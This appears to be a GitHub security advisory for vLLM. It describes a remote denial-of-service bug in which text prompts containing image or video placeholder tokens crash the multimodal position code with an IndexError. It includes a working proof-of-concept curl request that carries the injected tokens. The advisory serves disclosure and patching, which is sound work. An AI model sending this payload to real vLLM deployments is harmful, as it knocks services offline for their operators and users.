GHSA-hpv8-x276-m59f
vLLM Vulnerable to Remote DoS via Special-Token Placeholders
Details
## Summary This report explains a Token Injection vulnerability in vLLM’s multimodal processing. Unauthenticated, text-only prompts that spell special tokens are interpreted as control. Image and video placeholder sequences supplied without matching data cause vLLM to index into empty grids during input-position computation, raising an unhandled IndexError and terminating the worker or degrading availability. Multimodal paths that rely on `image_grid_thw`/`video_grid_thw` are affected. Severity: High (remote DoS). Reproduced on vLLM 0.10.0 with Qwen2.5-VL.
## Details - Affected component: multimodal input position computation. - File/functions (paths are indicative): - vllm/model_executor/layers/rotary_embedding.py - get_input_positions_tensor(...) - _vl_get_input_positions_tensor(...) - Failure mechanism: - The code counts detected vision tokens and then indexes video_grid_thw/image_grid_thw accordingly. - When user input carries placeholder tokens but no actual multimodal payload, these grids are empty. The code does not bounds-check before indexing.
Representative snippet (context): ```python # vllm/model_executor/layers/rotary_embedding.py @classmethod def _vl_get_input_positions_tensor( cls, input_tokens, hf_config, image_grid_thw, video_grid_thw, ..., ): # detect video tokens video_nums = (vision_tokens == video_token_id).sum() # later in processing t, h, w = ( video_grid_thw[video_index][0], # IndexError if no video data video_grid_thw[video_index][1], video_grid_thw[video_index][2], ) ```
Abbreviated call path: ``` OpenAI API request → vllm.v1.engine.core: step/execute_model → vllm.v1.worker.gpu_model_runner: _update_states/execute_model → vllm.model_executor.layers.rotary_embedding: get_input_positions_tensor → _vl_get_input_positions_tensor → IndexError: list index out of range ```
## PoC ### Environment - vLLM: 0.10.0 - Model: Qwen/Qwen2.5-VL-3B-Instruct - Launch server: ```bash python -m vllm.entrypoints.openai.api_server \ --model Qwen/Qwen2.5-VL-3B-Instruct \ --port 8000 ```
### Request (text-only, no image/video data) ```bash cat > request.json <<'JSON' { "model": "Qwen/Qwen2.5-VL-3B-Instruct", "messages": [ { "role": "user", "content": [ { "type": "text", "text": "what's in picture <|vision_start|><|image_pad|><|vision_end|>" } ] } ] } JSON
curl -s http://127.0.0.1:8000/v1/chat/completions \ -H 'Content-Type: application/json' \ --data @request.json ```
### Observed result - HTTP 500; logs show IndexError: list index out of range from _vl_get_input_positions_tensor(...). - In some deployments, the worker exits and capacity remains reduced until manual restart.
## Impact - Type: Token Injection leading to Remote Denial of Service (unauthenticated). A single request can trigger the fault. - Scope: Any vLLM deployment that serves VLMs and accepts raw user text via OpenAI-compatible endpoints (self-hosted or proxied/managed fronts). - Effect: Request → unhandled exception in position computation → worker termination / service unavailability.
## Fixes
* Changes associated with https://github.com/vllm-project/vllm/issues/32656
## Credits Pengyu Ding (Infra Security, Ant Group) Ziteng Xu (Infra Security, Ant Group)
Are you affected?
Enter the version of the package you're using.